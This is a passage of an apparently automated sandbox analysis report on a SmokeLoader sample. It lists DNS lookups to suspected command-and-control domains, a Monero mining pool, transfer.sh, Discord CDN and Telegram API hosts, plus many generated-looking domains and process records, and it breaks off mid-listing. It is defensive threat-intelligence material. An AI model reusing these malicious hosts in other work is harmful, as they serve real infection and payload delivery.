                                                                                                            Jan 14, 2022 14:00:10.643510103 CET192.168.2.38.8.8.80xe07fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:12.873323917 CET192.168.2.38.8.8.80x79ebStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:13.268222094 CET192.168.2.38.8.8.80xd5a6Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:13.874664068 CET192.168.2.38.8.8.80x563Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.087749958 CET192.168.2.38.8.8.80xc4f5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.303622961 CET192.168.2.38.8.8.80xb39cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:16.296823025 CET192.168.2.38.8.8.80x4af4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:17.093225956 CET192.168.2.38.8.8.80x75bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:18.008430958 CET192.168.2.38.8.8.80x1eb9Standard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:20.643426895 CET192.168.2.38.8.8.80xbd42Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.402417898 CET192.168.2.38.8.8.80x892bStandard query (0)pool.supportxmr.comA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:31.145945072 CET192.168.2.38.8.8.80x69a2Standard query (0)a0621686.xsph.ruA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:38.237560034 CET192.168.2.38.8.8.80xa2efStandard query (0)transfer.shA (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:43.658696890 CET192.168.2.38.8.8.80x7572Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                            Jan 14, 2022 13:58:53.545952082 CET8.8.8.8192.168.2.30x3c03No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:53.998173952 CET8.8.8.8192.168.2.30x59aeNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:54.439436913 CET8.8.8.8192.168.2.30xeea9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:55.028279066 CET8.8.8.8192.168.2.30xc87aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:55.195472002 CET8.8.8.8192.168.2.30x3339No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:55.369292974 CET8.8.8.8192.168.2.30xc30cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:56.768579960 CET8.8.8.8192.168.2.30xe92aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:56.934833050 CET8.8.8.8192.168.2.30x406dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:58:57.437783957 CET8.8.8.8192.168.2.30x5486No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:02.003447056 CET8.8.8.8192.168.2.30x377bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:02.245398045 CET8.8.8.8192.168.2.30xd52eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:02.514441013 CET8.8.8.8192.168.2.30xd9b2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:03.635468006 CET8.8.8.8192.168.2.30x5a92No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:04.165971994 CET8.8.8.8192.168.2.30xae9fNo error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:05.566719055 CET8.8.8.8192.168.2.30xae9fNo error (0)privacy-tools-for-you-780.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:06.997880936 CET8.8.8.8192.168.2.30x8c4bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.170008898 CET8.8.8.8192.168.2.30x3c08No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.429474115 CET8.8.8.8192.168.2.30x96d9No error (0)unicupload.top54.38.220.85A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.567471981 CET8.8.8.8192.168.2.30xa642No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.734281063 CET8.8.8.8192.168.2.30x16fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:07.899265051 CET8.8.8.8192.168.2.30x6064No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:08.065099001 CET8.8.8.8192.168.2.30x5295No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:08.233400106 CET8.8.8.8192.168.2.30x8ac3No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:10.087042093 CET8.8.8.8192.168.2.30xd7baNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:10.696794987 CET8.8.8.8192.168.2.30xa8dbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:11.195509911 CET8.8.8.8192.168.2.30x4cf2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:11.408962011 CET8.8.8.8192.168.2.30x6d73No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:13.593172073 CET8.8.8.8192.168.2.30x78d9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:13.761769056 CET8.8.8.8192.168.2.30x527eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:13.925363064 CET8.8.8.8192.168.2.30xfcd7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:14.143767118 CET8.8.8.8192.168.2.30x439eNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:14.143767118 CET8.8.8.8192.168.2.30x439eNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:14.143767118 CET8.8.8.8192.168.2.30x439eNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:14.143767118 CET8.8.8.8192.168.2.30x439eNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:14.143767118 CET8.8.8.8192.168.2.30x439eNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:18.034032106 CET8.8.8.8192.168.2.30xdc8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:18.241882086 CET8.8.8.8192.168.2.30x13b1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:18.452987909 CET8.8.8.8192.168.2.30x3ba6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:40.005820990 CET8.8.8.8192.168.2.30xad11No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:40.588044882 CET8.8.8.8192.168.2.30xa2fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:40.819777966 CET8.8.8.8192.168.2.30x522fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.217735052 CET8.8.8.8192.168.2.30xe169No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.407866955 CET8.8.8.8192.168.2.30x2944No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.620006084 CET8.8.8.8192.168.2.30x5775No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:42.810046911 CET8.8.8.8192.168.2.30x98e8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.003878117 CET8.8.8.8192.168.2.30xf863No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.271547079 CET8.8.8.8192.168.2.30x1351No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.465672970 CET8.8.8.8192.168.2.30x8c40No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:43.776849985 CET8.8.8.8192.168.2.30x609fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:44.088958025 CET8.8.8.8192.168.2.30x5705No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:44.563781977 CET8.8.8.8192.168.2.30x752bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:45.022387981 CET8.8.8.8192.168.2.30x4bfbNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:46.535403967 CET8.8.8.8192.168.2.30x8865No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:46.729526043 CET8.8.8.8192.168.2.30xcff2No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.132339954 CET8.8.8.8192.168.2.30xdf5fNo error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.132339954 CET8.8.8.8192.168.2.30xdf5fNo error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.702605963 CET8.8.8.8192.168.2.30x8325No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:47.877559900 CET8.8.8.8192.168.2.30x492aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.061381102 CET8.8.8.8192.168.2.30x852dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.312066078 CET8.8.8.8192.168.2.30x6f9eNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.482312918 CET8.8.8.8192.168.2.30x8624No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.713406086 CET8.8.8.8192.168.2.30xec81No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:48.996695042 CET8.8.8.8192.168.2.30xeef8No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:50.326821089 CET8.8.8.8192.168.2.30x2db8No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:50.528990984 CET8.8.8.8192.168.2.30x8e7bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:52.363843918 CET8.8.8.8192.168.2.30xc02aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:52.786081076 CET8.8.8.8192.168.2.30xc0fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:53.010150909 CET8.8.8.8192.168.2.30xe6a3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:53.405926943 CET8.8.8.8192.168.2.30x43c6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:53.907783985 CET8.8.8.8192.168.2.30x4d58No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:57.344748974 CET8.8.8.8192.168.2.30x35abNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:57.514636993 CET8.8.8.8192.168.2.30x27c5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:59.385862112 CET8.8.8.8192.168.2.30x905aNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 13:59:59.555340052 CET8.8.8.8192.168.2.30x905aNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.096995115 CET8.8.8.8192.168.2.30x9da2No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.096995115 CET8.8.8.8192.168.2.30x9da2No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.096995115 CET8.8.8.8192.168.2.30x9da2No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.096995115 CET8.8.8.8192.168.2.30x9da2No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.096995115 CET8.8.8.8192.168.2.30x9da2No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.636590958 CET8.8.8.8192.168.2.30xa04dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:04.946705103 CET8.8.8.8192.168.2.30xcc76No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:05.298472881 CET8.8.8.8192.168.2.30xe601No error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:10.144378901 CET8.8.8.8192.168.2.30x4a2bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:10.661026955 CET8.8.8.8192.168.2.30xe07fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:12.891941071 CET8.8.8.8192.168.2.30x79ebNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:13.590600967 CET8.8.8.8192.168.2.30xd5a6No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:13.892220020 CET8.8.8.8192.168.2.30x563No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.104923964 CET8.8.8.8192.168.2.30xc4f5No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.323115110 CET8.8.8.8192.168.2.30xb39cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.323115110 CET8.8.8.8192.168.2.30xb39cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.323115110 CET8.8.8.8192.168.2.30xb39cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.323115110 CET8.8.8.8192.168.2.30xb39cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:14.323115110 CET8.8.8.8192.168.2.30xb39cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:16.315987110 CET8.8.8.8192.168.2.30x4af4No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:17.113708973 CET8.8.8.8192.168.2.30x75bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:18.030103922 CET8.8.8.8192.168.2.30x1eb9No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:20.665946960 CET8.8.8.8192.168.2.30xbd42No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:20.665946960 CET8.8.8.8192.168.2.30xbd42No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:20.665946960 CET8.8.8.8192.168.2.30xbd42No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:20.665946960 CET8.8.8.8192.168.2.30xbd42No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:20.665946960 CET8.8.8.8192.168.2.30xbd42No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.436964989 CET8.8.8.8192.168.2.30x892bNo error (0)pool.supportxmr.compool-fr.supportxmr.comCNAME (Canonical name)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.436964989 CET8.8.8.8192.168.2.30x892bNo error (0)pool-fr.supportxmr.com37.187.95.110A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.436964989 CET8.8.8.8192.168.2.30x892bNo error (0)pool-fr.supportxmr.com91.121.140.167A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.436964989 CET8.8.8.8192.168.2.30x892bNo error (0)pool-fr.supportxmr.com149.202.83.171A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.436964989 CET8.8.8.8192.168.2.30x892bNo error (0)pool-fr.supportxmr.com94.23.247.226A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:22.436964989 CET8.8.8.8192.168.2.30x892bNo error (0)pool-fr.supportxmr.com94.23.23.52A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:31.169972897 CET8.8.8.8192.168.2.30x69a2No error (0)a0621686.xsph.ru141.8.192.193A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:38.257224083 CET8.8.8.8192.168.2.30xa2efNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                                                                                            Jan 14, 2022 14:00:43.675483942 CET8.8.8.8192.168.2.30x7572No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • doekvpclh.net
                                                                                                              • host-data-coin-11.com
                                                                                                            • cfaivcludy.net
                                                                                                            • ydoois.net
                                                                                                            • jpiiaqw.org
                                                                                                            • aoblnua.org
                                                                                                            • riacbys.net
                                                                                                            • elxvnyxk.com
                                                                                                            • mcvlfhw.net
                                                                                                            • data-host-coin-8.com
                                                                                                            • wrbmaiqv.net
                                                                                                            • wqgqp.com
                                                                                                            • fenydm.net
                                                                                                            • firfcooyt.net
                                                                                                            • privacy-tools-for-you-780.com
                                                                                                            • rwudvrtrt.net
                                                                                                            • omhff.net
                                                                                                            • unicupload.top
                                                                                                            • fbfbuopuh.org
                                                                                                            • fdhmpp.org
                                                                                                            • yyvmhh.org
                                                                                                            • carudedeao.net
                                                                                                            • ihkfjyj.org
                                                                                                            • sqcnkaq.com
                                                                                                            • nbxmbl.org
                                                                                                            • ecbfled.com
                                                                                                            • 185.7.214.171:8080
                                                                                                            • emncntmtow.net
                                                                                                            • qsefotqodc.org
                                                                                                            • mbnpyehjf.org
                                                                                                            • pehjgpd.org
                                                                                                            • vpoejhbse.org
                                                                                                            • xemsp.com
                                                                                                            • juqsasu.org
                                                                                                            • vmgenst.org
                                                                                                            • bfkxhfurw.com
                                                                                                            • jldaqud.net
                                                                                                            • yoawoahu.org
                                                                                                            • ulvvu.com
                                                                                                            • jndibx.com
                                                                                                            • aifro.com
                                                                                                            • awvcsqp.com
                                                                                                            • hsqarkq.org
                                                                                                            • ucyfot.org
                                                                                                            • xjtksbsy.com
                                                                                                            • ppqljylf.org
                                                                                                            • fxxlivvp.net
                                                                                                            • kkdbsrky.com
                                                                                                            • deegamxl.com
                                                                                                            • xcxiyncehq.org
                                                                                                            • wsvmrr.com
                                                                                                            • jqpeh.com
                                                                                                            • oaaiijnxpe.org
                                                                                                            • jaevdkvwx.net
                                                                                                            • jqjxcwg.net
                                                                                                            • 81.163.30.181
                                                                                                            • rllyqcpmf.net
                                                                                                            • yftnkjjlq.org
                                                                                                            • ufufplcjp.net
                                                                                                            • kbvly.com
                                                                                                            • lhythml.org
                                                                                                            • xfgpe.org
                                                                                                            • dleeejmcen.net
                                                                                                            • owkrx.com
                                                                                                            • tqglpd.org
                                                                                                            • vednhhpcxu.org
                                                                                                            • asmhpljw.com
                                                                                                            • kakoewy.org
                                                                                                            • ukwfgyyso.com
                                                                                                            • yqamoj.com
                                                                                                            • fqxsvrlwpv.net
                                                                                                            • bjxsvd.com

                                                                                                            Code Manipulations

                                                                                                            Statistics

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            Analysis Process: 9ro85QVN0F.exe PID: 6156 Parent PID: 3412

                                                                                                            General

                                                                                                            Start time:13:58:09
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\Desktop\9ro85QVN0F.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\9ro85QVN0F.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low

                                                                                                            Analysis Process: 9ro85QVN0F.exe PID: 6980 Parent PID: 6156

                                                                                                            General

                                                                                                            Start time:13:58:11
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Users\user\Desktop\9ro85QVN0F.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\9ro85QVN0F.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:320000 bytes
                                                                                                            MD5 hash:4E806C42B23B043FA7409D108EECAADB
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.340237120.0000000000530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.340386924.00000000022F1000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                            Reputation:low

                                                                                                            Analysis Process: svchost.exe PID: 2224 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:12
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 6672 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:12
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 6596 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:13
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 6580 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:13
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 4776 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:14
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: SgrmBroker.exe PID: 5388 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:14
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                            Imagebase:0x7ff793b50000
                                                                                                            File size:163336 bytes
                                                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: svchost.exe PID: 5020 Parent PID: 572

                                                                                                            General

                                                                                                            Start time:13:58:15
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                            Imagebase:0x7ff70d6e0000
                                                                                                            File size:51288 bytes
                                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high

                                                                                                            Analysis Process: explorer.exe PID: 3352 Parent PID: 6980

                                                                                                            General

                                                                                                            Start time:13:58:18
                                                                                                            Start date:14/01/2022
                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                            Imagebase:0x7ff720ea0000
